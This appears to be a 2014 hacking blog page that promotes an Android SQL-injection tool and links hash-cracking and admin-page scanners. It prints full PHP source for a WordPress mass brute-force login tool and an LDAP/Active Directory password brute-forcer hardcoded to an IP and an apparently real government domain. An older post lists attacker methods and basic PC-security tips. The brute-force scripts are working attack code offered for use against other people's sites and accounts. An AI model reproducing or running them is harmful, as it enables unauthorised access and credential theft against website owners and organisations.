Facebook

Sunday, January 19, 2014

HOW TO HACK A WEBSITE USING ANDROID PHONE - DROIDSQLI

How to hack a website using Android phone - Droidsqli

Hello Guys today we talk about how to hacked a website using your Android phone.We know that in the world 70% website hacked by using SQL injection.
For automate SQL injection We need tool or OS - back track, havij or Kali, and etc..But now you can attack on site using your android mobile phone and Tables and hack website.

Only you need 3 things
1 - SQL Vulnerable site
2 - android mobile
3 - Droidsqli tool

Download Droid SQLi


DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.
DroidSQLi supports the following injection techniques:
Time based injection
Blind injection
Error based injection
Normal injection



It automatically selects the best technique to use and employs some simple filter evasion methods

Hex Legend :)

Bypass Your Surveys

To Bypass Survey use this tool :

https://addons.mozilla.org/en-US/firefox.../noscript/

It really works :)

HASH CRACKER, DORKS & LOGIN PAGE SCANNER

Hash Cracker:-
MD5
MD5(MD5)
MD4
MD2
SHA1
NTLM
LM
Wordpress
http://isoftwarez.com/scanner/cracker/?

Sqli Dork Scanner:-
http://isoftwarez.com/scanner/scanner/?

Admin Login Page Scanner:-
http://isoftwarez.com/scanner/admin/?

WORDPRESS MASS BRUTEFORCE

Here Is A Tool For WP Mass BruteForce .. .. ..

PHP CODE:

<?
# Wordpress Mass brute Force Priv8 ^_*
# Coded by Lagrip-dz
# Devloped by Th3 K!LL3r Dz
# Style Leacked By Th3 K!LL3r Dz
echo '<html>
<head>
<link href="http://dz48-coders.org/indexi/pic/favicon.ico" type="image/x-icon" rel="shortcut icon" />
<meta name="author" content="Th3 K!LL3r Dz" />
<meta name="keywords" content="website, Relizane, hackers ,relizane hacker" />
<meta name="description" content="Th3 K!LL3r Dz fr0m Relizane !n aLGeria" />
<title># Wordpress Mass brute Force #</title>
<style type=\'text/css\'>
input[type=submit], input[type=button], input[type=reset]{
text-align:center;
background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
border:1px solid #4D4D4D;
color:#FFFFFF;
border-top-color:#565656;
padding:4px 6px;
margin:4px 5px;
height:16px;
-moz-box-shadow:0 0 1px black;
-webkit-box-shadow:0 0 1px black;
box-shadow:0 0 1px black;
text-shadow:0 1px black;
-moz-border-radius:4px;
-webkit-border-radius:4px;
-khtml-border-radius:4px;
border-radius:4px;
height:23px;
}


input[type=text], input[type=password]{
background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
border:1px solid #4D4D4D;
color:#CCCCCC;
border-top-color:#565656;
-moz-box-shadow:0 0 1px black;
-webkit-box-shadow:0 0 1px black;
box-shadow:0 0 1px black;
-moz-border-radius:4px;
-webkit-border-radius:4px;
-khtml-border-radius:4px;
border-radius:4px;
height:18px;
margin-left: 5px;
}
input , textarea , button , body , caption , table ,area , option {
outline:none;
transition: all 0.20s ease-in-out;
-webkit-transition: all 0.25s ease-in-out;
-moz-transition: all 0.25s ease-in-out;
border-radius:3px;
-webkit-border-radius:3px;
-moz-border-radius:3px;
//border:1px solid rgba(0,0,0, 0.2);
/* font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
}
input , textarea {
background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
}

input , textarea {
outline:none;
transition: all 0.20s ease-in-out;
-webkit-transition: all 0.25s ease-in-out;
-moz-transition: all 0.25s ease-in-out;
border-radius:3px;
-webkit-border-radius:3px;
-moz-border-radius:3px;
border:1px solid rgba(0,0,0, 0.2);
}
input:focus, textarea:focus {
outline: 0;
border-color: rgba(82, 168, 236, 0.8);
-webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
-moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);


background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
overflow: auto;

}
.x1 {}
.x2 {font-size:13px;
background-color:green;
color:black;}
hr {color:white;}
a {color:black;}
#x5 {
font-family:tahoma;}
.d1 {color :#C17E0B;
font-family:tahoma;
font-size:13px;
font-weight:bold;}
#d4 {color:#C17E0B;
font-family:tahoma;
font-weight:bold;}
</style>
</head>
</br></br>
<center><b><font > Wordpress Mass brute Force </font></b><br /><br /><br />
<form method="post" action="" enctype="multipart/form-data">
<table width="50%" border="0">
<tr><td><p ><font class="d1">User :</font>
<input type="text" name="usr" value=\'admin\' size="15"> </font><br /><br /></p>
</td></tr>
<tr><td><font class="d1">Sites list :</font>
</td><td><font class="d1" >Pass list :</font></td></tr>
<tr><td>
<textarea name="sites" cols="40" rows="13" ></textarea>
</td><td>
<textarea name="w0rds" cols="20" rows="13" >
admin
123456
password
102030
123123
12345
123456789
pass
test
admin123
demo
</textarea>
</td></tr><tr><td>
<font >
<input type="submit" name="x" value="start" id="d4">
</font></td></tr></table>
</form></center>' ;
@ set_time_limit ( 0 );


if( $_POST [ 'x' ]){

echo "<hr>" ;

$sites = explode ( "\n" , $_POST [ "sites" ]); // Get Sites By Th3 K!LL3r Dz !
$w0rds = explode ( "\n" , $_POST [ "w0rds" ]); // Get w0rdLiSt By Th3 K!LL3r Dz !

$Attack = new Wordpress_brute_Force (); // Active Class


foreach( $w0rds as $pwd ){

foreach( $sites as $site ){


$Attack -> check_it ( txt_cln ( $site ), $_POST [ 'usr' ], txt_cln ( $pwd )); // Brute :D
flush (); flush ();

}

}

}


# Class & Function'z

function txt_cln ( $value ){ return str_replace (array( "\n" , "\r" ), "" , $value ); }

class Wordpress_brute_Force {

public function check_it ( $site , $user , $pass ){ // print result

if( eregi ( 'profile.php' , $this -> post ( $site , $user , $pass ))){
echo "<span class=\"x2\"><b># Success : $user : $pass -> <a href=' $site /wp-admin/'> $site /wp-admin/</a></b></span><BR>" ;
$f = fopen ( "Wp-Result.txt" , "a+" ); fwrite ( $f , "Success ~~ $user : $pass -> $site /wp-admin/\n" ); fclose ( $f );
flush ();
}else{ echo "# Failed : $user : $pass -> $site <BR>" ; flush ();}

}

public function post ( $site , $user , $pass ){ // Post -> user & pass
$login = $site . '/wp-login.php' ;
$to = $site . '/wp-admin' ;
$token = $this -> extract_token ( $site );
$log = array ( 'Log In' , 'دخول' );
$data = array ( 'log' => $user , 'pwd' => $pass , 'rememberme' => 'forever' , 'wp-submit' => $log , 'redirect_to' => $to , 'testcookie' => 1 );

$curl = curl_init ();

curl_setopt ( $curl , CURLOPT_RETURNTRANSFER , 1 );
curl_setopt ( $curl , CURLOPT_URL , $login );
@ curl_setopt ( $curl , CURLOPT_COOKIEFILE , 'cookie.txt' );
@ curl_setopt ( $curl , CURLOPT_COOKIEJAR , 'cookie.txt' );
curl_setopt ( $curl , CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4' );
@ curl_setopt ( $curl , CURLOPT_FOLLOWLOCATION , 1 );
curl_setopt ( $curl , CURLOPT_POST , 1 );
curl_setopt ( $curl , CURLOPT_POSTFIELDS , $data );
curl_setopt ( $curl , CURLOPT_TIMEOUT , 20 );

$exec = curl_exec ( $curl );
curl_close ( $curl );
return $exec ;

}

public function extract_token ( $site ){ // get token from source for -> function post

$source = $this -> get_source ( $site );

preg_match_all ( "/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" , $source , $token );

return $token [ 1 ][ 0 ];

}

public function get_source ( $site ){ // get source for -> function extract_token

$curl = curl_init ();
curl_setopt ( $curl , CURLOPT_RETURNTRANSFER , 1 );
curl_setopt ( $curl , CURLOPT_URL , $login );
@ curl_setopt ( $curl , CURLOPT_COOKIEFILE , 'cookie.txt' );
@ curl_setopt ( $curl , CURLOPT_COOKIEJAR , 'cookie.txt' );
curl_setopt ( $curl , CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4' );
@ curl_setopt ( $curl , CURLOPT_FOLLOWLOCATION , 1 );
curl_setopt ( $curl , CURLOPT_TIMEOUT , 20 );

$exec = curl_exec ( $curl );
curl_close ( $curl );
return $exec ;

}

}
?>

LDAP(Active Directory) Brute Force

Here a script to test ldap(Active Directory) users.

Ldap module install:

Quote:~# apt-get install php5-ldap


Use:
Quote:php ldap_brute.php user_list.txt pass_list.txt log.txt

Code:

<?php

/*
 * Simple Ldap (Active Directory) brute force
 * by n4sss.
 * 
 * Need php5-ldap module in php (:
 * ~# apt-get install php5-ldap
 * ---snip---
 * 
 * 
 * php ldap_brute.php user_list.txt pass_list.txt log.txt
 * 
 *     $AD_server = "IP_AD";          
 *    $domain = "DOMAIN_AD";
 * 
 * 
 * twt -> @n4sss
 * 
 * */

error_reporting(0);


function save_content($file, $content){
    $fp = fopen($file, "a");
          fwrite($fp, $content."\r\n");
          fclose($fp);
}

function ad_connect($user, $pass, $log){
    $AD_server = "172.28.105.254";          
    $domain = "dpu.gov.br";
    $ad = ldap_connect($AD_server);
          ldap_set_option($ad, LDAP_OPT_PROTOCOL_VERSION, 3);
          ldap_set_option($ad, LDAP_OPT_REFERRALS, 0);

    foreach($user as $user_id => $user_try){
        foreach($pass as $pass_id => $pass_try){
            sleep(1); // Edit it, if nescessary (:
        if(!empty($user_try)){
            $user_try = trim($user_try);
            print "[$user_id] Trying user -> $user_try\n";
            $bd = ldap_bind($ad, $user_try."@".$domain, $pass_try);
            if( $bd ){
                print "\n+----------------------+\n";
                print "[+] $user_try - Password -> $pass_try\n";
                print "+------------------------+\n\n";
                save_content($log, "$user_try:$pass_try");
                }else{
                    echo "[-] WRONG!\n";
                 }
            ldap_unbind($ad);
       }
   }
}
}

if(!$argv[1] || !$argv[2] || !$argv[3]){
       print "==================================\n";
       print "Easy ldap(AD) brute force by n4sss\n";
       print "==================================\n";
       print "USE:\n";
       print "===> php $argv[0] user_list.txt pass_list.txt log.txt\n";
       exit(0);       
    }else{
       $user = explode("\n", file_get_contents("$argv[1]"));
       $pass = array_filter(explode("\n", file_get_contents("$argv[2]")));
       $log = trim("$argv[3]");
       ad_connect($user, $pass,    $log);
  }

?>

Monday, January 13, 2014

How To Secure Your PC From Hackers

Today we will Discuss 
How to secure Your PC From Hackers First off we will discuss that How hackers hack Your PC ?

Hackers Use Many Method We will Discuses How they Hack and How to Secure Your self from this Kinds of attack I Hope you will feel some secure after reading this article and If you still have any Question You Guys Can Contact Us








1.Keylogger

Keylogger is a Software which save all your keystroke,screenshot and any activity you do on your pc its send to the attacker
2.Password Stealer ( iStealer ) 

Password's Stealer can still  Your hotmail, netlog, facebook, WoW, rapidshare,Yahoo any All Logins saved in your browser its steal from browser

3.RAT ( Remote Access Trojan )

Remote Access Trojan is a Software to control your pc.Its Allow Attacker to control your system He can do basically anything with your computer using RAT 

4.Botnet

It is also possible to use web browser hacking to infect computers with bot malware.Hacker can attack on big target website using your pc to take it down

5.Metasploit Framework

Its open-source computer security project actually its just designed for security vulnerabilities to find in system but hacker is misusing it they use it exploiting system they search vulnerability in that system and Exploit it and gained access

6.Crypter 

Crypter is a kind of tool which make the above tools undetectable from anti virus mean anti virus didn't detect it thats its a virus

We Have Discuses About some Method's which hackers Mostly used to Hack System.Now we will Discuses How to secure your self from these kinds of attack


Hackers Create a server file using Keylogger,Password Stealer,Rat,Botnet software and then they send to user and user download it and when the user open it his pc became a slave of Attacker.The Attacker Always send the file in torrent kinds of files,games,softwares or some hacking software's people search for this kind of hack's and they download software and they dont know its infected and they became a slave of attacker
Hackers Use Crypter to Make the file Undetectable from antivirus but the file will be detectable after 1-2 week

So If some one send u link or asked to download it never download it Or Download it wait for 2 weeks after that scan with anti virus if its detect thats mean its contain virus if not then lucky 

Some Tips : 
  •  Always Use Antivirus ( Paid Version ) 
  • Always Use Password for antivirus
  • Always Update Your browser / antivirus ( if any new version available ) 
  • Never Download Any file if any unknown send u 
  • Always Use COMODO Firewall  It will Help u to Protect u pc from hackers if any connection incoming to u first of all it will ask for permission from you if you think its any unknown ip just Denied it will help you that hackers cant connect to your pc.Its also Help in closing all the ports attacker try to find open port and then they attack but this soft help u to close all your ports which make it hard for attacker to exploit your system through metasploit
  • Always use Anti Keylogger
  • Use Malwarebytes 
Tutorial By Hex Legend - Pakistan Cyber Army - MaDLeeTs Team -